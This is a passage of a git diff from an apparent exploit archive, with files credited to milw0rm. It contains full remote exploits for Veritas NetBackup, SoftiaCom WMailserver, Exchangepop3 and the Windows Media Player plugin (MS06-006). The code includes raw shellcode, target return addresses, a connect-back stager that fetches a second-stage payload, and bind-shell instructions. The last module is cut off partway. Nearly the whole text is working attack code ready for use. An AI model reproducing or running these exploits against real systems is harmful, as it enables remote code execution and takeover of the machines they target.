+ "\x92\x46\x6c\x9d\xce\xe7\x6c\xad\xda\x14\x8f\x63\x9c\x44\x0b\xbd"
+ "\x2d\x9c\x81\xbe\xb4\x22\xd4\xdf\xba\x3d\x94\xdf\x8d\x1e\x18\x3d"
+ "\xba\x81\x0a\x11\xe9\x1a\x18\x3b\x8d\xc3\x02\x8b\x53\xa7\xef\xef"
+ "\x87\x20\xe5\x12\x02\x22\x3e\xe4\x27\xe7\xb0\x12\x04\x19\xb4\xbe"
+ "\x81\x19\xa4\xbe\x91\x19\x18\x3d\xb4\x22\xf6\xb1\xb4\x19\x6e\x0c"
+ "\x47\x22\x43\xf7\xa2\x8d\xb0\x12\x04\x20\xf7\xbc\x87\xb5\x37\x85"
+ "\x76\xe7\xc9\x04\x85\xb5\x31\xbe\x87\xb5\x37\x85\x37\x03\x61\xa4"
+ "\x85\xb5\x31\xbd\x86\x1e\xb2\x12\x02\xd9\x8f\x0a\xab\x8c\x9e\xba"
+ "\x2d\x9c\xb2\x12\x02\x2c\x8d\x89\xb4\x22\x84\x80\x5b\xaf\x8d\xbd"
+ "\x8b\x63\x2b\x64\x35\x20\xa3\x64\x30\x7b\x27\x1e\x78\xb4\xa5\xc0"
+ "\x2c\x08\xcb\x7e\x5f\x30\xdf\x46\x79\xe1\x8f\x9f\x2c\xf9\xf1\x12"
+ "\xa7\x0e\x18\x3b\x89\x1d\xb5\xbc\x83\x1b\x8d\xec\x83\x1b\xb2\xbc"
+ "\x2d\x9a\x8f\x40\x0b\x4f\x29\xbe\x2d\x9c\x8d\x12\x2d\x7d\x18\x3d"
+ "\x59\x1d\x1b\x6e\x16\x2e\x18\x3b\x80\xb5\x37\x85\x22\xc0\xe3\xb2"
+ "\x81\xb5\x31\x12\x02\x4a\xe7\xed";
+
+char szBuffer[] =
+ // We cannot use this small part.
+ "a"
+ "AAAAAAAAAAAAAAAAAAAA"
+ "AAAAAAAAAAAAAAAAAAAA"
+ "AAAAAAAAAAAAAAAAAAAA"
+ "AAAAAAAAAAAAAAAAAAA"
+
+ // Since the buffer is so small, we even need a part of
+ // the SOCKADDR_IN structure. No problem.
+
+ // struct sockaddr_in {
+ "BB" // sin_family
+ "BB" // sin_port
+ "BBBB" // in_addr
+ // "BBBBBBBB" // sin_zero
+ // }
+
+ // 'START'
+
+ // Move the stackpointer. (0x0012F??? -> 0x0012F000)
+ "\xC1\xEC\x0C" // SHR ESP, 0x0C
+ "\xC1\xE4\x0C" // SHL ESP, 0x0C
+
+ // Call socket().
+ "\x33\xDB" // XOR EBX, EBX
+ "\x53" // PUSH EBX
+ "\x43" // INC EBX
+ "\x53" // PUSH EBX
+ "\x43" // INC EBX
+ "\x53" // PUSH EBX
+ "\xBB\x88\x72\x44\x00" // MOV EBX, 447288 [socket()]
+ "\xFF\x13" // JMP DWORD PTR [EBX]
+ "\x8B\xF8" // MOV EDI, EAX
+ // [edi -> socket]
+
+ // Call connect().
+ "\x33\xDB" // XOR EBX, EBX
+ "\xB3\x16" // MOV BL, 16
+ "\x53" // PUSH EBX
+ "\xBB\x60\xF3\x12\x00" // MOV EBX, 12F360
+ "\x53" // PUSH EBX
+ "\x57" // PUSH EDI
+ "\xBB\x4C\x72\x44\x00" // MOV EBX, 44724C [connect()]
+ "\xFF\x13" // JMP DWORD PTR [EBX]
+
+ // We need space.
+ "\x8B\xD4" // MOV EDX, ESP
+ "\x80\xC6\x01" // ADD DH, 1
+
+ // Call recv().
+ "\x33\xDB" // XOR EBX, EBX
+ "\x53" // PUSH EBX
+ "\x43" // INC EBX
+ "\xC1\xE3\x10" // SHL EBX, 8 [1 -> 65536]
+ "\x53" // PUSH EBX
+ "\x52" // PUSH EDX
+ "\x57" // PUSH EDI
+ "\xBB\x34\x72\x44\x00" // MOV EBX, 447234 [recv()]
+ "\xFF\x13" // JMP DWORD PTR [EBX]
+
+ // And again.
+ "\x8B\xD4" // MOV EDX, ESP
+ "\x80\xC6\x01" // ADD DH, 1
+
+ // Jump to our shellcode.
+ "\xFF\xE2" // JMP EDX
+
+ "O"
+ "W"
+ "N"
+ "E"
+ "D"
+ "!"
+
+ "\x68\xF3\x12\x00" // Here our code starts :).
+ "\x00\xF0\x12\x00"; // Just a random readable address.
+
+// This is the NOT-interesting part :).
+
+DWORD main(int argc, char *argv[]) {
+ printf("Veritas NetBackup v4/v5/v6 \"Volume Manager Daemon\" Stack Overflow.\n");
+
+ // We need a local port and ip because our first buffer is way too small
+ // to contain our complete shellcode. We use a small shellcode first to
+ // retrieve the second shellcode. The only method that fitted as first
+ // shellcode was a connect-back shellcode. For the second we got LOADS of
+ // space :).
+ if (argc<5) {
+ printf("Usage: %s \n\n", argv[0]);
+ printf("Types (tested):\n");
+ printf(" 0 - NetBackup v5.0_1A\n");
+ printf(" NetBackup v5.0_2\n");
+ printf(" NetBackup v5.0_3\n");
+ printf(" NetBackup v5.1\n\n");
+ return NULL;
+ }
+
+ WSADATA wsa;
+ WSAStartup(MAKEWORD(2,0), &wsa);
+
+ sockaddr_in strTarget;
+ memset(&strTarget, 0, sizeof(strTarget));
+ strTarget.sin_addr.s_addr = inet_addr(argv[3]);
+ strTarget.sin_family = AF_INET;
+ strTarget.sin_port = htons(13701);
+
+ iLocalOpenPort = atoi(argv[2]);
+ HANDLE hStage2 = CreateThread(NULL, 0, SendShellcode, 0, 0, 0);
+
+ SOCKET sTarget = socket(AF_INET, SOCK_STREAM, 0);
+ int iResult = connect(sTarget, (struct sockaddr *)&strTarget, sizeof(strTarget));
+
+ if (iResult != SOCKET_ERROR) {
+ printf("Sending first buffer.\n");
+ // Fill in the structure.
+ unsigned long family = AF_INET;
+ memcpy(szBuffer + 80, &family, 2);
+ unsigned long port = htons(iLocalOpenPort);
+ memcpy(szBuffer + 82, &port, 2);
+ unsigned long ip = inet_addr(argv[1]);
+ memcpy(szBuffer + 84, &ip, 4);
+
+ send(sTarget, szBuffer, sizeof(szBuffer)-1, 0);
+ closesocket(sTarget);
+ }
+
+ WaitForSingleObject(hStage2, 3000);
+ WSACleanup();
+ return NULL;
+}
+
+DWORD WINAPI SendShellcode(LPVOID lpParam) {
+ SOCKET sTarget;
+ SOCKET sAccept;
+ struct hostent *hp;
+ struct sockaddr_in strTarget;
+ struct sockaddr_in strAccept;
+
+ int iStrSize = sizeof(strTarget);
+
+ memset(&strTarget, 0, sizeof(strTarget));
+ strTarget.sin_addr.s_addr = INADDR_ANY;
+ strTarget.sin_family = AF_INET;
+ strTarget.sin_port = htons(iLocalOpenPort);
+
+ sTarget = socket(AF_INET, SOCK_STREAM, 0);
+ bind(sTarget, (struct sockaddr *)&strTarget, iStrSize);
+ listen(sTarget, 2);
+ sAccept = accept(sTarget, (struct sockaddr *)&strAccept, &iStrSize);
+
+ if (sAccept != INVALID_SOCKET) {
+ printf("Sending second buffer.\n");
+ send(sAccept, szShellcode, sizeof(szShellcode) - 1, 0);
+ closesocket(sAccept);
+ }
+
+ return NULL;
+}
+
+// milw0rm.com [2006-01-16]
diff --git a/platforms/windows/remote/1463.pm b/platforms/windows/remote/1463.pm
index 268c40c91..f8cbd1311 100755
--- a/platforms/windows/remote/1463.pm
+++ b/platforms/windows/remote/1463.pm
@@ -1,108 +1,107 @@
-
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::wmailserver_smtp;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-
-my $advanced = { };
-
-my $info =
- {
-
- 'Name' => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',
- 'Version' => '$Revision: 1.1 $',
- 'Authors' => [ 'y0 [at] w00t-shell.net', ],
- 'Arch' => [ 'x86' ],
- 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp' ],
- 'Priv' => 0,
- 'UserOpts' =>
- {
- 'RHOST' => [1, 'ADDR', 'The target address'],
- 'RPORT' => [1, 'PORT', 'The target port', 25],
- 'SSL' => [0, 'BOOL', 'Use SSL'],
- },
- 'AutoOpts' => { 'EXITFUNC' => 'thread' },
- 'Payload' =>
- {
- 'Space' => 600,
- 'BadChars' => "\x00\x0a\x0d\x20:=+\x22",
- 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
- 'Keys' => ['+ws2ord'],
- },
-
- 'Description' => Pex::Text::Freeform(qq{
- This module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)
- via a SEH frame overwrite.
-}),
-
- 'Refs' =>
- [
- ['CVE', 'CAN-2005-2287'],
- ['BID', '14213'],
- ],
- 'Targets' =>
- [
- ['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],
- ['Windows 2000 English ALL', 0x75022ac4],
- ['Windows XP English SP0/SP1', 0x71aa32ad],
- ],
- 'Keys' => ['smtp'],
- };
-
-sub new {
- my $class = shift;
- my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
- return($self);
-}
-
-sub Exploit
-{
- my $self = shift;
- my $target_host = $self->GetVar('RHOST');
- my $target_port = $self->GetVar('RPORT');
- my $target_idx = $self->GetVar('TARGET');
- my $shellcode = $self->GetVar('EncodedPayload')->Payload;
- my $target = $self->Targets->[$target_idx];
-
- if (!
$self->InitNops(128)) {
- $self->PrintLine("[*] Failed to initialize the nop module.");
- return;
- }
-
- my $splat = Pex::Text::UpperCaseText(5117);
-
- my $sploit =
- " ". $splat. "\xeb\x06". pack('V', $target->[1]).
- $shellcode. "\r\n\r\n";
-
- $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
-
- my $s = Msf::Socket::Tcp->new
- (
- 'PeerAddr' => $target_host,
- 'PeerPort' => $target_port,
- 'LocalPort' => $self->GetVar('CPORT'),
- 'SSL' => $self->GetVar('SSL'),
- );
- if ($s->IsError) {
- $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
- return;
- }
-
- $s->Send($sploit);
- $self->Handler($s);
- $s->Close();
- return;
-}
-
-1;
-
-# milw0rm.com [2006-02-01]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::wmailserver_smtp;
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+
+my $advanced = { };
+
+my $info =
+ {
+
+ 'Name' => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',
+ 'Version' => '$Revision: 1.1 $',
+ 'Authors' => [ 'y0 [at] w00t-shell.net', ],
+ 'Arch' => [ 'x86' ],
+ 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp' ],
+ 'Priv' => 0,
+ 'UserOpts' =>
+ {
+ 'RHOST' => [1, 'ADDR', 'The target address'],
+ 'RPORT' => [1, 'PORT', 'The target port', 25],
+ 'SSL' => [0, 'BOOL', 'Use SSL'],
+ },
+ 'AutoOpts' => { 'EXITFUNC' => 'thread' },
+ 'Payload' =>
+ {
+ 'Space' => 600,
+ 'BadChars' => "\x00\x0a\x0d\x20:=+\x22",
+ 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
+ 'Keys' => ['+ws2ord'],
+ },
+
+ 'Description' => Pex::Text::Freeform(qq{
+ This module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)
+ via a SEH frame overwrite.
+}),
+
+ 'Refs' =>
+ [
+ ['CVE', 'CAN-2005-2287'],
+ ['BID', '14213'],
+ ],
+ 'Targets' =>
+ [
+ ['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],
+ ['Windows 2000 English ALL', 0x75022ac4],
+ ['Windows XP English SP0/SP1', 0x71aa32ad],
+ ],
+ 'Keys' => ['smtp'],
+ };
+
+sub new {
+ my $class = shift;
+ my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+ return($self);
+}
+
+sub Exploit
+{
+ my $self = shift;
+ my $target_host = $self->GetVar('RHOST');
+ my $target_port = $self->GetVar('RPORT');
+ my $target_idx = $self->GetVar('TARGET');
+ my $shellcode = $self->GetVar('EncodedPayload')->Payload;
+ my $target = $self->Targets->[$target_idx];
+
+ if (! $self->InitNops(128)) {
+ $self->PrintLine("[*] Failed to initialize the nop module.");
+ return;
+ }
+
+ my $splat = Pex::Text::UpperCaseText(5117);
+
+ my $sploit =
+ " ". $splat. "\xeb\x06". pack('V', $target->[1]).
+ $shellcode. "\r\n\r\n";
+
+ $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
+
+ my $s = Msf::Socket::Tcp->new
+ (
+ 'PeerAddr' => $target_host,
+ 'PeerPort' => $target_port,
+ 'LocalPort' => $self->GetVar('CPORT'),
+ 'SSL' => $self->GetVar('SSL'),
+ );
+ if ($s->IsError) {
+ $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+ return;
+ }
+
+ $s->Send($sploit);
+ $self->Handler($s);
+ $s->Close();
+ return;
+}
+
+1;
+
+# milw0rm.com [2006-02-01]
diff --git a/platforms/windows/remote/1466.pl b/platforms/windows/remote/1466.pl
index eeae9f44d..3451a279a 100755
--- a/platforms/windows/remote/1466.pl
+++ b/platforms/windows/remote/1466.pl
@@ -1,61 +1,61 @@
-#!/usr/bin/perl -w
-# for educational purposes only .
- use IO::Socket;
- if ($#ARGV<0)
- {
- print "\n write the target IP!! \n\n";
- exit;
- }
- $buffer2 = "\x90"x1999999;
- $mailf= "mail";
- $rcptt ="rcpt to:<";
- $buffer = "\x41"x4100;
- $ret = "\x80\x1d\xdc\x02";
- $shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33".
- "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C".
- "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE".
- "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB".
- "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77".
- "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77".
- "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77".
- "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77".
- "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77".
- "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77".
- "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77".
- "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77".
- "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77".
- "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB".
- "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C".
- "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0".
- "\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77".
- "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0".
- "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB".
- "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5".
- "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98".
- "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE".
- "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77".
- "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8".
- "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF".
- "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90".
- "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74".
- "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4".
- "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94".
- "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5".
- "\xD3\x4A\x8C\x88";
-
- $enter = "\x0d\x0a";
- $connect = IO::Socket::INET ->new (Proto=>"tcp",
- PeerAddr=> "$ARGV[0]",
- PeerPort=>"25"); unless ($connect) { die "cant connect" }
- print "\nExchangepop3 v5.0 remote exploit by securma massine\n";
- print "\n+++++++++++www.morx.org++++++++++++++++\n";
- $connect->recv($text,128);
- print "$text\n";
- $connect->send($mailf . $enter);
- $connect->recv($text,128);
- print "$text\n";
- $connect->send($rcptt . $buffer . $ret . $buffer2 . $shellcode . $enter);
- print "\nsending exploit......\n\n";
- print "\ntelnet to server port 9191 .........\n\n";
-
-# milw0rm.com [2006-02-03]
+#!/usr/bin/perl -w
+# for educational purposes only .
+ use IO::Socket;
+ if ($#ARGV<0)
+ {
+ print "\n write the target IP!! \n\n";
+ exit;
+ }
+ $buffer2 = "\x90"x1999999;
+ $mailf= "mail";
+ $rcptt ="rcpt to:<";
+ $buffer = "\x41"x4100;
+ $ret = "\x80\x1d\xdc\x02";
+ $shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33".
+ "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C".
+ "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE".
+ "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB".
+ "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77".
+ "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77".
+ "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77".
+ "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77".
+ "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77".
+ "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77".
+ "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77".
+ "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77".
+ "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77".
+ "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB".
+ "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C".
+ "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0".
+ "\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77".
+ "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0".
+ "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB".
+ "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5".
+ "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98".
+ "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE".
+ "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77".
+ "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8".
+ "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF".
+ "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90".
+ "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74".
+ "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4".
+ "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94".
+ "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5".
+ "\xD3\x4A\x8C\x88";
+
+ $enter = "\x0d\x0a";
+ $connect = IO::Socket::INET ->new (Proto=>"tcp",
+ PeerAddr=> "$ARGV[0]",
+ PeerPort=>"25"); unless ($connect) { die "cant connect" }
+ print "\nExchangepop3 v5.0 remote exploit by securma massine\n";
+ print "\n+++++++++++www.morx.org++++++++++++++++\n";
+ $connect->recv($text,128);
+ print "$text\n";
+ $connect->send($mailf . $enter);
+ $connect->recv($text,128);
+ print "$text\n";
+ $connect->send($rcptt . $buffer . $ret . $buffer2 . $shellcode .
$enter);
+ print "\nsending exploit......\n\n";
+ print "\ntelnet to server port 9191 .........\n\n";
+
+# milw0rm.com [2006-02-03]
diff --git a/platforms/windows/remote/1504.pm b/platforms/windows/remote/1504.pm
index 07a077750..9b315cc68 100755
--- a/platforms/windows/remote/1504.pm
+++ b/platforms/windows/remote/1504.pm
@@ -1,266 +1,266 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::wmp_plugin_ms06_006; - -use strict; -use base "Msf::Exploit"; -use Pex::Text; -use IO::Socket::INET; -use IPC::Open3; - - my $advanced = - { - 'Gzip' => [1, 'Enable gzip content encoding'], - 'Chunked' => [1, 'Enable chunked transfer encoding'], - }; - -my $info = - { - 'Name' => 'Windows Media Player Plugin MS06-006 Overflow', - 'Version' => '$Revision: 1.1 $', - 'Authors' => - [ - 'H D Moore - Pex::Text::Freeform(qq{ - This module exploits a vulnerability in the Windows Media Player plugin - for non-Microsoft web browsers. This module has been tested with Windows - Media Player 9 on Windows 2000 SP4, Windows XP SP2, and Windows 2003 SP0 - (Firefox 1.5 and Opera 8.5). -}), - - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32', 'winxp', 'win2003' ], - 'Priv' => 0, - - 'AutoOpts' => { 'EXITFUNC' => 'process', 'GETPCTYPE' => 'ecx' }, - 'UserOpts' => - { - 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], - 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], - 'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ], - }, - - 'Payload' => - { - # give some stack space, align esp - 'Space' => 1024, - 'BadChars' => "\x00\x22".join('', map { $_=chr($_) } (0x80 .. 
0xff)),
- 'MinNops' => 0,
- 'MaxNops' => 0,
- },
- 'Refs' =>
- [
- ['CVE', '2006-0005'],
- ['OSVDB', '23132'],
- ['MSB', 'MS06-006'],
- ['BID', '15130'],
- ],
-
- 'DefaultTarget' => 0,
- 'Targets' =>
- [
- [ 'Automatic - WMP 9.0', 0x07694b1e ]
- ],
-
- 'Keys' => [ 'wmp' ],
-
- 'DisclosureDate' => 'Feb 14 2006',
- };
-
-sub new {
- my $class = shift;
- my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
- return($self);
-}
-
-sub Exploit
-{
- my $self = shift;
- my $server = IO::Socket::INET->new(
- LocalHost => $self->GetVar('HTTPHOST'),
- LocalPort => $self->GetVar('HTTPPORT'),
- ReuseAddr => 1,
- Listen => 1,
- Proto => 'tcp'
- );
- my $client;
-
- # Did the listener create fail?
- if (not defined($server)) {
- $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
- return;
- }
-
- my $httphost = $self->GetVar('HTTPHOST');
- $httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0';
-
- $self->PrintLine("[*] Waiting for connections to http://". $httphost .":".
$self->GetVar('HTTPPORT') ."/");
-
- while (defined($client = $server->accept())) {
- $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
- }
-
- return;
-}
-
-sub HandleHttpClient
-{
- my $self = shift;
- my $fd = shift;
-
- # Set the remote host information
- my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
-
-
- # Read the HTTP command
- my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
- my $agent;
-
- # Read in the HTTP headers
- while ((my $line = $fd->RecvLine(10))) {
-
- $line =~ s/^\s+|\s+$//g;
-
- my ($var, $val) = split(/\:/, $line, 2);
-
- # Break out if we reach the end of the headers
- last if (not defined($var) or not defined($val));
-
- $agent = $val if $var =~ /User-Agent/i;
- }
-
-
- my $addr;
-
- ##
- # XXX Does not detect Windows SP levels or WMP version :-(
- ##
-
- # Windows NT and Windows 2000 systems
- if ($agent =~ /Windows NT [45]\.0/) {
- $self->PrintLine("[*] Targetting WMP v9 on NT/2000...");
- $addr = 0x07694b1e; # wmp.dll v9.00.00.2980
- }
-
- # Windows XP SP2
- if ($agent =~ /Windows NT 5\.1/) {
- $self->PrintLine("[*] Targetting WMP v9 on XP SP2...");
- $addr = 0x4b5d5c74; # wmp.dll v9.00.00.3250
- }
-
- # Windows 2003 SP0
- if ($agent =~ /Windows NT 5\.2/) {
- $self->PrintLine("[*] Targetting WMP v9 on 2003 SP0...");
- $addr = 0x585a6052; # wmp.dll v9.00.00.2991
- }
-
-
- my $target = $self->Targets->[$self->GetVar('TARGET')];
- my $shellcode = $self->GetVar('EncodedPayload')->Payload;
- my $pattern = "C" x 4000;
-
- $addr = $target->[1] if ! $addr;
-
- # We can't use SEH getpc from inside a SEH handler on XP SP2 >:(
- # So we do it like a drunk ninja.
- my $getpc =
- "\x58\x58\x58". # pop eax, pop eax, pop eax
- "\x05\x18\x29\x29\x29". # add eax,0x29292917
- "\x2d\x01\x29\x29\x29".
# sub eax,0x29292901
- "\x50\x59"; # push eax, pop ecx
-
- substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
- substr($pattern, 2086, 4, pack('V', $addr));
- substr($pattern, 2090, length($getpc), $getpc);
- substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);
-
- my $content = "";
-
- $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");
-
- $fd->Send($self->BuildResponse($content));
-
- # Prevents IE from throwing an error in some cases
- select(undef, undef, undef, 0.1);
-
- $fd->Close();
-}
-
-sub RandomHeaders {
- my $self = shift;
- my $head = '';
-
- while (length($head) < 3072) {
- $head .= "X-" .
- Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
- Pex::Text::AlphaNumText(int(rand(256) + 5)) ."\r\n";
- }
- return $head;
-}
-
-
-sub BuildResponse {
- my ($self, $content) = @_;
-
- my $response =
- "HTTP/1.1 200 OK\r\n" .
- $self->RandomHeaders() .
- "Content-Type: text/html\r\n";
-
- if ($self->GetVar('Gzip')) {
- $response .= "Content-Encoding: gzip\r\n";
- $content = $self->Gzip($content);
- }
- if ($self->GetVar('Chunked')) {
- $response .= "Transfer-Encoding: chunked\r\n";
- $content = $self->Chunk($content);
- } else {
- $response .= 'Content-Length: ' . length($content) . "\r\n" .
- "Connection: close\r\n";
- }
-
- $response .= "\r\n" . $content;
-
- return $response;
-}
-
-sub Chunk {
- my ($self, $content) = @_;
-
- my $chunked;
- while (length($content)) {
- my $chunk = substr($content, 0, int(rand(10) + 1), '');
- $chunked .= sprintf('%x', length($chunk)) .
